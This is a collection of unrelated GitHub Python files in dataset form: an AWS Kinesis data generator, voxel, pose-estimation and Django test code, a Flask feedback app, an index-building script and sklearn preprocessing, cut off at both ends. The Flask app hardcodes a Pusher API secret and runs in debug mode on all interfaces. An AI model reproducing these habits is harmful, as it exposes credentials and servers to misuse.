measureCpuHi, measureCpuSi]\n totalOtherUsage = 0.0\n\n for measure in otherCpuMeasures:\n value = random.random()\n totalOtherUsage += value\n measure_values.append(MeasureValue(measure, value, 'DOUBLE'))\n\n cpuIdle = 100 - cpu_user - totalOtherUsage\n measure_values.append(MeasureValue(measureCpuIdle, round(cpuIdle, 2), 'DOUBLE'))\n\n remainingMeasures = [measureMemoryFree, measureMemoryUsed, measureMemoryCached, measureDiskIoReads,\n meausreDiskIoWrites, measureLatencyPerRead, measureLatencyPerWrite, measureNetworkBytesIn,\n measureNetworkBytesOut, measureDiskUsed, measureDiskFree, measureFileDescriptors]\n\n for measure in remainingMeasures:\n value = 100.0 * random.random()\n measure_values.append(MeasureValue(measure, value, 'DOUBLE'))\n\n return [create_record('metrics', measure_values, timestamp, dimensions)]\n\n\ndef createRandomEvent(timestamp, time_unit, dimensions):\n taskCompletion = MeasureValue(measureTaskCompleted, random.randint(0, 500), 'BIGINT')\n taskEndState = MeasureValue(measureTaskEndState, np.random.choice(measureValuesForTaskEndState, p=selectionProbabilities), 'VARCHAR')\n measure_values = [taskCompletion, taskEndState]\n\n remainingMeasures = [measureGcReclaimed, measureGcPause, measureMemoryFree]\n\n for measure in remainingMeasures:\n value = 100.0 * random.random()\n measure_values.append(MeasureValue(measure, value, 'DOUBLE'))\n\n return [create_record('events', measure_values, timestamp, dimensions)]\n\n\ndef create_record(object_type, measure_values, timestamp, dimensions):\n record = dict(dimensions)\n for mv in measure_values:\n record[mv.name] = mv.value\n record['time'] = timestamp\n record['@type'] = object_type\n return record\n\n\ndef send_records_to_kinesis(all_dimensions, kinesis_client, stream_name, sleep_time, percent_late, late_time):\n while True:\n if percent_late > 0:\n value = random.random()*100\n if (value >= percent_late):\n print('Generating On-Time Records.')\n local_timestamp = int(time.time())\n else:\n print('Generating Late Records.')\n local_timestamp = (int(time.time()) - late_time)\n else:\n local_timestamp = int(time.time())\n\n for series_id, dimensions in enumerate(all_dimensions):\n dimension_dict = dimensions._asdict()\n if isinstance(dimensions, DimensionsMetric):\n metrics = createRandomMetrics(series_id, local_timestamp, 'SECONDS', dimension_dict)\n else:\n metrics = createRandomEvent(local_timestamp, 'SECONDS', dimension_dict)\n\n records = []\n for metric in metrics:\n print(metric)\n data = json.dumps(metric)\n records.append({'Data': bytes(data, 'utf-8'), 'PartitionKey': dimension_dict['instance_name']})\n\n kinesis_client.put_records(StreamName=stream_name, Records=records)\n\n print('Wrote {} record to Kinesis Stream \\'{}\\''.format(\n 'event' if not isinstance(dimensions, DimensionsMetric) else 'metric', stream_name))\n \n if sleep_time > 0:\n time.sleep(float(sleep_time)) \n\ndef main(args):\n global utilizationRand\n global lowUtilizationHosts\n global highUtilizationHosts\n\n print(args)\n generate_events = args.generate_events\n generate_metrics = args.generate_metrics\n\n if not generate_events and not generate_metrics:\n print('Exiting: generate_events and generate_metrics are both false, so no data will be generated')\n sys.exit(0)\n\n host_scale = args.hostScale # scale factor for the hosts.\n\n dimensions_measures, dimensions_events = generateDimensions(host_scale)\n\n if generate_metrics:\n print('Dimensions for metrics: {}'.format(len(dimensions_measures)))\n if generate_events:\n print('Dimensions for events: {}'.format(len(dimensions_events)))\n\n host_ids = list(range(len(dimensions_measures)))\n utilizationRand.shuffle(host_ids)\n lowUtilizationHosts = frozenset(host_ids[0:int(0.2 * len(host_ids))])\n highUtilizationHosts = frozenset(host_ids[-int(0.2 * len(host_ids)):])\n\n def signal_handler(sig, frame):\n print('Exiting Application')\n sys.exit(0)\n\n signal.signal(signal.SIGINT, signal_handler)\n stream_name = args.stream\n region_name = args.region\n kinesis_client = boto3.client('kinesis', region_name=region_name)\n\n sleep_time = args.sleep_time\n percent_late = args.percent_late\n late_time = args.late_time\n\n try:\n kinesis_client.describe_stream(StreamName=stream_name)\n except:\n print('Unable to describe Kinesis Stream \\'{}\\' in region {}'.format(stream_name, region_name))\n sys.exit(0)\n\n dimensions = dimensions_measures if generate_metrics else []\n dimensions += dimensions_events if generate_events else []\n send_records_to_kinesis(dimensions,\n kinesis_client, stream_name, sleep_time, percent_late, late_time)\n\ndef str2bool(v):\n if isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n if v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n\n raise argparse.ArgumentTypeError('Boolean value expected.')\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(prog='timestream_kinesis_data_gen',\n description='DevOps Sample Data Generator for Timestream/KDA Sample Application.')\n\n parser.add_argument('--stream', action='store', type=str, default='TimestreamTestStream',\n help='The name of Kinesis Stream.')\n parser.add_argument('--region', '-e', action='store', choices=['us-east-1', 'us-east-2', 'us-west-2', 'eu-west-1'],\n default='us-east-1', help='Specify the region of the Kinesis Stream.')\n parser.add_argument('--host-scale', dest='hostScale', action='store', type=int, default=1,\n help='The scale factor determines the number of hosts emitting events and metrics.')\n parser.add_argument('--profile', action='store', type=str, default=None, help='The AWS Config profile to use.')\n\n # Optional sleep timer to slow down data\n parser.add_argument('--sleep-time', action='store', type=int, default=0,\n help='The amount of time in seconds to sleep between sending batches.')\n\n # Optional 'Late' arriving data parameters\n parser.add_argument('--percent-late', action='store', type=float, default=0,\n help='The percentage of data written that is late arriving ')\n parser.add_argument('--late-time', action='store', type=int, default=0,\n help='The amount of time in seconds late that the data arrives')\n\n # Optional type of data to generate\n parser.add_argument('--generate-events', action='store', type=str2bool, default=True,\n help='Whether to generate events')\n parser.add_argument('--generate-metrics', action='store', type=str2bool, default=True,\n help='Whether to generate metrics')\n\n main(parser.parse_args())\n","repo_name":"awslabs/amazon-timestream-tools","sub_path":"integrations/flink_connector/sample-data-generator/kinesis_data_gen.py","file_name":"kinesis_data_gen.py","file_ext":"py","file_size_in_byte":14223,"program_lang":"python","lang":"en","doc_type":"code","stars":223,"dataset":"github-code","pt":"85"} +{"seq_id":"20523881693","text":"import numpy as np\nimport open3d as o3d\n\nclass TimeSeriesVoxelGrid:\n def __init__(self, width, height, depth, num_steps, voxel_size=1.0):\n self.width = width\n self.height = height\n self.depth = depth\n self.num_steps = num_steps\n self.voxel_size = voxel_size\n self.grid = np.zeros((width, height, depth, num_steps), dtype=bool)\n\n def set_voxel(self, x, y, z, step):\n self.grid[x, y, z, step] = True\n\n def clear_voxel(self, x, y, z, step):\n self.grid[x, y, z, step] = False\n\n def is_voxel_set(self, x, y, z, step):\n return self.grid[x, y, z, step]\n\n def visualize(self, step):\n points = []\n for x in range(self.width):\n for y in range(self.height):\n for z in range(self.depth):\n if self.is_voxel_set(x, y, z, step):\n voxel_center = np.array([x, y, z]) * self.voxel_size\n points.append(voxel_center)\n if len(points) > 0:\n pcd = o3d.geometry.PointCloud()\n pcd.points = o3d.utility.Vector3dVector(np.array(points))\n o3d.visualization.draw_geometries([pcd])\n\n# Example usage\ngrid = TimeSeriesVoxelGrid(10, 10, 10, 5)\ngrid.set_voxel(5, 5, 5, 2)\ngrid.visualize(2)","repo_name":"virgantara/3D-Point-Cloud","sub_path":"VoxelGridTimeseries.py","file_name":"VoxelGridTimeseries.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"12761582720","text":"import cv2\nimport time\nimport mediapipe as mp\n\n\ncap = cv2.VideoCapture('Sample/pexels.mp4')\n\np_time = 0\nc_time = 0\n\nmpPose = mp.solutions.pose\npose = mpPose.Pose()\n\nmDraw = mp.solutions.drawing_utils\n\nwhile True:\n success, img = cap.read()\n\n img_RGB = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n\n result = pose.process(img_RGB)\n\n if result.pose_landmarks:\n mDraw.draw_landmarks(img, result.pose_landmarks, mpPose.POSE_CONNECTIONS)\n for id, lm in enumerate(result.pose_landmarks.landmark):\n h, w, c = img.shape\n cx, cy = int(lm.x*w), int(lm.y*h)\n\n cv2.circle(img, (cx, cy), 10, (255,0,0), cv2.FILLED)\n\n c_time = time.time()\n fps = 1 / (c_time - p_time)\n p_time = c_time\n\n # Adding FPS Text to the Video\n cv2.putText(img, str(int(fps)), (10, 70), cv2.FONT_HERSHEY_SIMPLEX, 3, (255, 0, 255), 3)\n\n cv2.imshow(\"Image\", img)\n\n cv2.waitKey(1)","repo_name":"Mayank187/poseEstimation","sub_path":"poseEstimation.py","file_name":"poseEstimation.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19834453685","text":"from django.test import TestCase\nfrom .models import DrinkOrder\nfrom .forms import DrinkOrderForm\n\n\nclass TestForms(TestCase):\n def test_drink_order_form_modal(self):\n model = DrinkOrder\n self.assertIs(model, DrinkOrder)\n\n def test_drink_order_form_field(self):\n fields = (\"full_name\", \"email\", \"phone_number\",\n \"street_address1\", \"street_address2\", \"postcode\",\n \"country\",)\n self.assertTrue(fields, tuple)\n\n def test_placeholders(self):\n placeholders = {\n \"full_name\": \"Full Name\",\n \"email\": \"Email\",\n \"phone_number\": \"Phone Number\",\n \"street_address1\": \"Street Address 1\",\n \"street_address2\": \"Street Address 2\",\n \"postcode\": \"Postal Code\",\n }\n self.assertTrue(placeholders, dict)\n\n def test_input_fields(self):\n self.assertTrue(\"country\", str)\n\n def test_payment_form_full_name_is_required(self):\n form = DrinkOrderForm({\"full_name\": \"\"})\n self.assertFalse(form.is_valid())\n self.assertIn(\"full_name\", form.errors.keys())\n self.assertEqual(form.errors[\"full_name\"]\n [0], \"This field is required.\")\n\n def test_payment_form_email_is_required(self):\n form = DrinkOrderForm({\"email\": \"\"})\n self.assertFalse(form.is_valid())\n self.assertIn(\"email\", form.errors.keys())\n self.assertEqual(form.errors[\"email\"][0], \"This field is required.\")\n\n def test_payment_form_phone_number_is_required(self):\n form = DrinkOrderForm({\"phone_number\": \"\"})\n self.assertFalse(form.is_valid())\n self.assertIn(\"phone_number\", form.errors.keys())\n self.assertEqual(form.errors[\"phone_number\"]\n [0], \"This field is required.\")\n\n def test_payment_form_street_address1_is_required(self):\n form = DrinkOrderForm({\"street_address1\": \"\"})\n self.assertFalse(form.is_valid())\n self.assertIn(\"street_address1\", form.errors.keys())\n self.assertEqual(form.errors[\"street_address1\"]\n [0], \"This field is required.\")\n\n def test_payment_form_postcode_is_required(self):\n form = DrinkOrderForm({\"postcode\": \"\"})\n self.assertFalse(form.is_valid())\n self.assertIn(\"postcode\", form.errors.keys())\n self.assertEqual(form.errors[\"postcode\"]\n [0], \"This field is required.\")\n\n def test_payment_form_country_is_required(self):\n form = DrinkOrderForm({\"country\": \"\"})\n self.assertFalse(form.is_valid())\n self.assertIn(\"country\", form.errors.keys())\n self.assertEqual(form.errors[\"country\"][0], \"This field is required.\")\n\n def test_payment_form_street_address2_is_not_required(self):\n form = DrinkOrderForm({\"full_name\": \"Test\",\n \"email\": \"Test\",\n \"phone_number\": \"Test\",\n \"street_address1\": \"Test\",\n \"street_address2\": \"\",\n \"postcode\": \"Test\",\n \"country\": \"Test\",\n })\n self.assertFalse(form.is_valid())\n\n def test_fields_are_explicit_in_form_metaclass(self):\n form = DrinkOrderForm()\n fields = (\"full_name\", \"email\", \"phone_number\",\n \"street_address1\", \"street_address2\", \"postcode\",\n \"country\",)\n self.assertEqual(form.Meta.fields, fields)\n","repo_name":"VioletViolaVi/Milestone-Project-4","sub_path":"payment/tests_forms.py","file_name":"tests_forms.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"27618495837","text":"import json\n\nwith open('./results-noise-wLDSF.json') as f:\n res = json.load(f)\n\na = \"a\"\nfor i in range(50):\n print(\"{},{},{},{},{},{},{},{}\".format(\n i+1, res[\"changeParentNodes\"][i], res[\"APAS\"][\"el\"][i], res[\"APAS\"][\"sr\"][i]*100,\n res[\"LLSF\"][\"el\"][i], res[\"LLSF\"][\"sr\"][i]*100,\n res[\"LDSF\"][\"el\"][i], res[\"LDSF\"][\"sr\"][i]*100))\n","repo_name":"uconn-cps-lab/6TiSCH-Cloud","sub_path":"6TiSCH-Cloud-Frontend/src/components/schedule/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"35248667314","text":"import os,sys\nimport re\nimport threading\n\nfrom flask import Flask, render_template, request, jsonify\nfrom pusher import Pusher\nimport json\n\nfrom profanityfilter import ProfanityFilter #pip install profanityfilter #https://github.com/areebbeigh/profanityfilter\n\nsys.path.insert(0,'../pygas')\nfrom truthpipes_eth_channel import alg_mint_rule_text\n\n\n#0v1# JC Nov 9, 2019\n\n\npf = ProfanityFilter()\n\n\n# create flask app\napp = Flask(__name__)\n\n# configure pusher object\npusher = Pusher(\n app_id='893453',\n key='7b7eba95325c46e4012a',\n secret='db4ad3419ecac13d7abf',\n cluster='us2',\n ssl=True\n)\n\nLOCAL_DIR=os.path.join(os.path.dirname(__file__), \".\")\nstorage_filename=LOCAL_DIR+\"/storage1.tsv\"\n\nBACKGROUND_MINTING=True\n\ndef background_mint(the_text):\n print (\"[debug] calling mint in background (check finalization)\")\n mint_thread=threading.Thread(target=alg_mint_rule_text,args=[the_text])\n mint_thread.start()\n return\n\ndef local_mint_text(the_text):\n global BACKGROUND_MINTING\n ## Filter before\n #** also clipped at 300\n the_text=filter_displayed(the_text)\n\n ONLY_MINT_AMAZON=True\n if ONLY_MINT_AMAZON:\n m=re.search(r'\\b(B[\\dA-Z]{5,20})',the_text)\n if m:\n amazon_asin=m.group(1)\n print (\"Minting AMAZON feedback to eth: \"+str(amazon_asin))\n if BACKGROUND_MINTING:\n background_mint(amazon_asin)\n else:\n alg_mint_rule_text(amazon_asin)\n else:\n if BACKGROUND_MINTING:\n alg_mint_rule_text(the_text)\n else:\n alg_mint_rule_text(the_text)\n return\n\ndef censor_phrase(phrase):\n global pf\n return pf.censor(phrase)\n\ndef remove_private_info(phrase):\n #scrub email\n phrase=re.sub(r'[\\w\\.-]+@[\\w\\.-]+(\\.[\\w]+)+','',phrase) #no email\n phrase=re.sub(r'[\\w\\.-]+@[\\w\\.-]+(\\.[\\w]+)+','',phrase) #no email\n \n #scrub hex\n phrase=re.sub(r'([0-9A-Fx]){30,100}','',phrase,flags=re.I)\n \n if not phrase:\n phrase=''\n\n return phrase\n\ndef filter_displayed(phrase):\n if len(re.split(r' ',phrase))<3:\n#D# print (\".. skipping short feedback: \"+str(phrase))\n phrase=''\n phrase=censor_phrase(phrase)\n \n #Remove email address and wallets\n phrase=remove_private_info(phrase)\n \n return phrase\n\ndef dict2storage(the_dict):\n global storage_filename\n ffp=open(storage_filename,'a',encoding='utf-8')\n ffp.write(json.dumps(the_dict))\n ffp.write(\"\\n\")\n ffp.flush()\n ffp.close()\n return\n\ndef load_dicts():\n global storage_filename\n the_dicts=[]\n ffp=open(storage_filename,'r',encoding='utf-8')\n id=-1\n for liner in ffp.readlines():\n id+=1\n dd=json.loads(liner.strip())\n dd['id']=str(id)\n dd['completed']=0\n\n# dd['value']=censor_phrase(dd['comment'])\n dd['value']=filter_displayed(dd['comment'])\n \n if dd['value'] and dd['value'] is not None:\n the_dicts+=[dd]\n ffp.close()\n# print (\">> RETURNING: \"+str(the_dicts))\n return the_dicts\n\n# index route, shows index.html view\n@app.route('/')\ndef index():\n ## Initial render\n dds=load_dicts()\n print (\"Preloaded: \"+str(dds))\n\n return render_template('index.html',init_data=dds) #\n\n# endpoint for storing todo item\n@app.route('/add-todo', methods = ['POST'])\ndef addTodo():\n #JC# data = json.loads(str(request.data)) # load JSON data from request\n data=json.loads(request.get_data().decode('utf8')) #Not data as bytes\n private_contact=data.pop('value2','')\n pusher.trigger('todo', 'item-added', data) # trigger `item-added` event on `todo` channel\n\n #print (\"Should have added: \"+str(data))\n #Should have added: {'completed': 0, 'id': 'item-1573074396448', 'value': 'me'}\n dd={}\n dd['comment']=data['value']\n# dd['contact']=private_contact\n dict2storage(dd)\n \n print (\"[debug] calling mint add todo to ethereum\")\n local_mint_text(data['value'])\n \n return jsonify(data)\n\n# endpoint for deleting todo item\n@app.route('/remove-todo/')\ndef removeTodo(item_id):\n data = {'id': item_id }\n pusher.trigger('todo', 'item-removed', data)\n return jsonify(data)\n\n# endpoint for updating todo item\n@app.route('/update-todo/', methods = ['POST'])\ndef updateTodo(item_id):\n data1=json.loads(request.get_data().decode('utf8')) #Not data as bytes\n data = {\n 'id': item_id,\n 'completed': data1.get('completed', 0)\n }\n pusher.trigger('todo', 'item-updated', data)\n return jsonify(data)\n\n# run Flask app in debug mode\napp.run(host=\"0.0.0.0\",port=80,debug=True)\n\n\n\n\n\n","repo_name":"panamantis/truthpipes","sub_path":"idea_tracker/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"5098308028","text":"import pika\nimport uuid\nimport pickle\nfrom rpc import RPC, ORDER\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))\nchannel = connection.channel()\n\n# create anonymous queue\nresult = channel.queue_declare(exclusive=True)\ncallback_queue = result.method.queue\n\n\ndef callback(ch, method, properties, body):\n if method.routing_key == 'orders':\n print(\"Got my order {}\".format(pickle.load(body)))\n\n\nchannel.basic_consume(callback,\n queue=callback_queue,\n no_ack=True)\n\nchannel.basic_publish(exchange='',\n routing_key='orders',\n properties=pika.BasicProperties(reply_to=callback_queue,\n correlation_id=str(uuid.uuid1())),\n body=pickle.dumps(RPC(ORDER, {'hamburger': 2})))\nprint(\"Order placed\")\n\nchannel.start_consuming()\n\nconnection.close()\n","repo_name":"vascoalramos/cd","sub_path":"rabbit_mq/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"5225636564","text":"#!/usr/bin/env python3\n#Version 1.4\nfrom __future__ import print_function\nimport sys,os,re,getopt\nfrom subprocess import *\n## Make unix pipe commands work w/o errors\nimport signal\nsignal.signal(signal.SIGPIPE, signal.SIG_DFL)\n\n# genGaussData.py ${NCLUS} ${DIM} ${VAR} ${SIZE} gauss ${FOLD} ${QSIZE}\n#gaussian-nclus=${NCLUS}_dim=${DIM}_var=${VAR}_size=${SIZE}.hdf5\n#${VGDATA}/queries/gaussian-query-1_nclus=${NCLUS}_dim=${DIM}_var=${VAR}_size=${SIZE}.hdf5\n## Define constants\ndef usage(out):\n\tprint(\"Usage: ./single_sisap.py \", file=sys.stderr)\n\nif (len(sys.argv) < 6):\n\tusage(sys.stderr)\n\tsys.exit(2)\nuseSimpleQueries = False\nnclus = int(sys.argv[-7]) # numero de clusters\ndim = int(sys.argv[-6]) # la dimension de los vectores\nvar = sys.argv[-5]; # la varianza (devstd^2)\nsize = int(sys.argv[-4])\nradius = float(sys.argv[-3])\nnQueryFiles = int(sys.argv[-2])\nindexType = sys.argv[-1]\n\ndataDir = \"/Users/parnell/data\"\nqueryPath = \"%s/queries\" %dataDir\n\ni = 1\nbaseDataName = \"gaussian_nclus=%d_dim=%d_var=%s_size=%d\" %(nclus,dim,var,size)\ndataName = \"%s.vec\" %(baseDataName)\norig_data_file = \"%s/%s\" %(dataDir,dataName)\nqueryFile = \"%s/gaussian-query-%d_nclus=%d_dim=%d_var=%s_size=%d.vec\" %(queryPath,i,nclus,dim,var,size)\n\n# orig_data_files = [\"%s/gaussian_1_5_0.8_1000000.vec\" %dataDir]\n# query_file = \"%s/gaussian_query_1_5_0.8_100.vec\" %dataDir ## our query file\n\nbprog = \"build-%s-vectors\" %indexType #specify the prog to use\nqprog = \"query-%s-vectors\" %indexType #specify the query prog to use\nrstart= radius ## radius start\nrstep= radius ## radius step\nrlimit=radius ## radius end\nntrees = [1] ## Number of trees created\nloopArray = ntrees\n# variances = [\"0.01\", \"0.1\", \"0.2\",\"0.3\",\"0.4\",\"0.5\",\"0.6\",\"0.7\",\"0.8\"]\n# sizes = [\"10000\",\"100000\",\"10000000\"]\n\nindex_num =0\nindex_num+=1\n# orig_data_file = \"%s/gaussian_1_5_0.1_%s.vec\" %(dataDir,sizes[i])\n# query_file = \"%s/gaussian_query_1_5_0.1_%s_100.vec\" %(dataDir,sizes[i]) ## our query file\n\norig_index_name=\"%s_%d_%d_%s_%d_%d_dim\" %(indexType, nclus, dim, var, size, index_num)\n\n## Other constants\nrun_sisap_prog = \"run_sisap.py\"\nsplit_prog = \"splitdata.py\"\nconvert_prog = \"convertcoords\"\norig_data_basename = os.path.basename(orig_data_file)\nrcfile = \"%s-row-column.txt\" %orig_index_name\n\norig_output_dir = \"%s_output\" %orig_index_name\nindex_dir = \"%s/indexes\" %orig_output_dir\nsplit_dir = \"%s/%s_splits\" %(dataDir,baseDataName)\n\norig_results_file = \"%s-results.txt\" %orig_index_name\nrcfile = \"%s-column.txt\" %orig_index_name\nPT_RESULT = re.compile(\"Total distances per query: ([^ ]+)$\")\nPT_BEGIN_FASTA = re.compile(\"^>\")\n\n## make the output directory if it doesnt exist\nif not os.path.exists(orig_output_dir):\n os.makedirs(orig_output_dir)\n\n## Find datatype\ndatatype = \"vectors\"\nfor line in open(orig_data_file):\n if PT_BEGIN_FASTA.match(line): datatype = \"fasta\"\n break\nprint( \"building index '%s' datatype='%s'\" %(orig_data_file, datatype))\n\n## Write the number of trees\nrcf = open(\"%s/%s\" %(orig_output_dir,rcfile),\"w\")\nfor nt in loopArray:\n rcf.write(\"\\t%d\" %nt)\nrcf.write(\"\\n\")\nrcf.close()\n\n\n## for each of the specified trees\nfor nt in loopArray:\n nt = int(nt)\n print( \"############################## %d\" %nt)\n ### Create our data and index directories\n psplit_dir = \"%s_%d\" %(split_dir,nt)\n pindex_dir = \"%s_%d\" %(index_dir,nt)\n if not os.path.exists(psplit_dir):\n os.makedirs(psplit_dir)\n if not os.path.exists(pindex_dir):\n os.makedirs(pindex_dir)\n\n ### Split data into nt parts\n cmdstr = \"%s -o %s -k %d %s\" %(split_prog,psplit_dir,nt,orig_data_file)\n print( cmdstr)\n retcode = call(cmdstr, shell=True)\n poutput_loc = \"%s/%d_%s\" %(orig_output_dir,nt,orig_index_name)\n\n ### Data must now be converted to Sisap format\n for i in range(0,nt):\n dt = \"--data-type=string\"\n psplit_name = \"split_%d_%s\" %(i,orig_data_basename)\n if datatype == \"vectors\":\n dt = \"--data-type=vector\"\n psplit_bin = \"%s.bin\" %(psplit_name)\n pdata_file = \"%s/%s\" %(psplit_dir,psplit_bin)\n cmdstr = \"%s '%s/%s' '%s'\" %(convert_prog,psplit_dir,psplit_name, pdata_file)\n if i==0 or i==nt-1: print( \">%s\" %cmdstr)\n if not os.path.exists(pdata_file):\n retcode = call(cmdstr, shell=True) \n elif i==0 or i==nt-1:\n print(\"convertcoords: skipped because file already exists\") \n else :\n pdata_file = \"%s/%s\" %(psplit_dir, psplit_name)\n \n \n ### Now we can run sisap.py on each of the splits\n pindex_name=\"%d_%s\" %(i,orig_index_name)\n pquery_file = queryFile\n sim = \"--simple\" if useSimpleQueries else \"\"\n cmdstr = \"%s %s --index-name=%s --data-file=%s --index-dir=%s --query-file=%s --sisap-build=%s --sisap-query=%s --output-loc=%s --rstart=%f --rstep=%f --rlimit=%f %s\" \\\n %(run_sisap_prog,dt, pindex_name,pdata_file,pindex_dir,queryFile,bprog,qprog,poutput_loc, rstart, rstep, rlimit, sim)\n if i==0 or i==nt-1: print (\">%s\" %cmdstr)\n retcode = call(cmdstr, shell=True) \n \n \n\n","repo_name":"parnell/sisap_tools","sub_path":"single_sisap.py","file_name":"single_sisap.py","file_ext":"py","file_size_in_byte":5200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"39800548124","text":"from multiprocessing import Lock, Process, Queue, current_process\nimport time\nimport queue # imported for using queue.Empty exception\n\n\nfrom SupportPkg.screenshot import *\n#https://www.journaldev.com/15631/python-multiprocessing-example\n\nwork = ([\"A\", 5], [\"B\", 2], [\"C\", 1], [\"D\", 3],[\"E\", 5], [\"F\", 2], [\"G\", 1], [\"H\", 3])\n\n\ndef work_log(work_data):\n print(\" Process %s waiting %s seconds\" % (work_data[0], work_data[1]))\n time.sleep(int(work_data[1]))\n print(\" Process %s Finished.\" % work_data[0])\n\n\ndef pool_handler():\n p = Pool(2)\n p.map(work_log, work)\n\n\ndef print_func(continent='Asia'):\n if(continent=='1'):\n print('The name of continent is : ', continent)\n ScreenshotSaveOption()\n else:\n print('The name of continent is : ', continent)\n\ndef do_job(tasks_to_accomplish, tasks_that_are_done):\n while True:\n try:\n '''\n try to get task from the queue. get_nowait() function will \n raise queue.Empty exception if the queue is empty. \n queue(False) function would do the same task also.\n '''\n task = tasks_to_accomplish.get_nowait()\n except queue.Empty:\n\n break\n else:\n '''\n if no exception has been raised, add the task completion \n message to task_that_are_done queue\n '''\n print(task)\n tasks_that_are_done.put(task + ' is done by ' + current_process().name)\n time.sleep(.5)\n return True\n\n\ndef Queuemain():\n number_of_task = 10\n number_of_processes = 4\n tasks_to_accomplish = Queue()\n tasks_that_are_done = Queue()\n processes = []\n\n for i in range(number_of_task):\n tasks_to_accomplish.put(\"Task no \" + str(i))\n\n # creating processes\n for w in range(number_of_processes):\n p = Process(target=do_job, args=(tasks_to_accomplish, tasks_that_are_done))\n processes.append(p)\n p.start()\n\n # completing process\n for p in processes:\n p.join()\n\n # print the output\n while not tasks_that_are_done.empty():\n print(tasks_that_are_done.get())\n\n return True\n\n\nif __name__ == \"__main__\": # confirms that the code is under main function\n names = ['America', 'Europe', 'Africa']\n procs = []\n #proc = Process(target=print_func) # instantiating without any argument\n #procs.append(proc)\n #proc.start()\n\n # instantiating process with arguments\n #for name in names:\n # print(name)\n while True:\n name = input()\n if(name == 'bye'):\n break\n proc = Process(target=print_func, args=(name,))\n procs.append(proc)\n proc.start()\n\n # complete the processes\n #for proc in procs:\n # proc.join()","repo_name":"arunkumar-js25/Assistant-Chatbot","sub_path":"SupportPkg/TryOuts/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"40026416826","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import svm\nfrom sklearn.metrics import confusion_matrix\n\ndf = pd.read_csv(\"dataset.csv\")\n#--------------------------------------------------------------------------------\n# Karim functions\n#--------------------------------------------------------------------------------\n\nprint(\"---------------------------------------------------------------\")\nprint(\"-----------------------Date-------------------------------\")\nprint(df)\n\n# ----------------------------- Clean first ------------------------------#\ndef mean() :\n df1 = pd.read_csv(\"data.csv\")\n imputer = SimpleImputer(missing_values=np.nan, strategy='mean')\n df1.iloc[:, 1:5] = pd.DataFrame(imputer.fit_transform(df1.iloc[:, 1:5]))\n imp = SimpleImputer(missing_values=np.nan, strategy='constant',fill_value=\"empty\")\n df1.iloc[:,0:5]= pd.DataFrame(imp.fit_transform(df1.iloc[:,0:5]))\n print('-------------Data After Imputer (mean)-------------')\n print(df1)\n\ndef median() :\n df2 = pd.read_csv(\"data.csv\")\n imputer = SimpleImputer(missing_values=np.nan, strategy='median')\n df2.iloc[:, 1:5] = pd.DataFrame(imputer.fit_transform(df2.iloc[:, 1:5]))\n imp = SimpleImputer(missing_values=np.nan, strategy='constant', fill_value=\"empty\")\n df2.iloc[:,0:5] = pd.DataFrame(imp.fit_transform(df2.iloc[:,0:5]))\n print('-------------Data After Imputer (median)-------------')\n print(df2)\n\ndef most_frequent() :\n # Imputer (most_frequent)\n df6 = pd.read_csv(\"data.csv\")\n imputer = SimpleImputer(missing_values=np.nan, strategy='most_frequent')\n df6.iloc[:, 1:5] = pd.DataFrame(imputer.fit_transform(df6.iloc[:, 1:5]))\n imp = SimpleImputer(missing_values=np.nan, strategy='constant', fill_value=\"empty\")\n df6.iloc[:,0:5] = pd.DataFrame(imp.fit_transform(df6.iloc[:,0:5]))\n print('-------------Data After Imputer (most_frequent)-------------')\n print(df6)\n\ndef constant() :\n df7 = pd.read_csv(\"data.csv\")\n imputer = SimpleImputer(missing_values=np.nan, strategy='constant',fill_value=\"empty\")\n df7.iloc[:,0:5] = pd.DataFrame(imputer.fit_transform(df7.iloc[:,0:5]))\n print('-------------Data After Imputer (constant)-------------')\n print(df7)\n\ndef one_Hot_Decoder() :\n df0 = pd.read_csv(\"data.csv\")\n ct = ColumnTransformer([('encoder', OneHotEncoder(handle_unknown='ignore'), [int(0)])], remainder='passthrough')\n df0 = pd.DataFrame(ct.fit_transform(df0))\n print('-------------Data After one Hot Decoder-------------')\n print(df0)\n\ndef LableDecoder() :\n df3 = pd.read_csv(\"data.csv\")\n le = LabelEncoder()\n df3.iloc[:,-1] = pd.DataFrame( le.fit_transform(df3.iloc[:, -1]))\n print('-------------Data After LableDecoder-------------')\n print(df3)\n\n\n\ndf = pd.read_csv(\"dataset.csv\")\nimputer = SimpleImputer(missing_values=np.nan, strategy='mean')\ndf.iloc[:, 1:] = pd.DataFrame(imputer.fit_transform(df.iloc[:, 1:]))\n\nle = LabelEncoder()\ndf.iloc[:, -1] = pd.DataFrame(le.fit_transform(df.iloc[:, -1]))\nct = ColumnTransformer([('encoder', OneHotEncoder(handle_unknown='ignore'), [int(0)])], remainder='passthrough')\ndf = 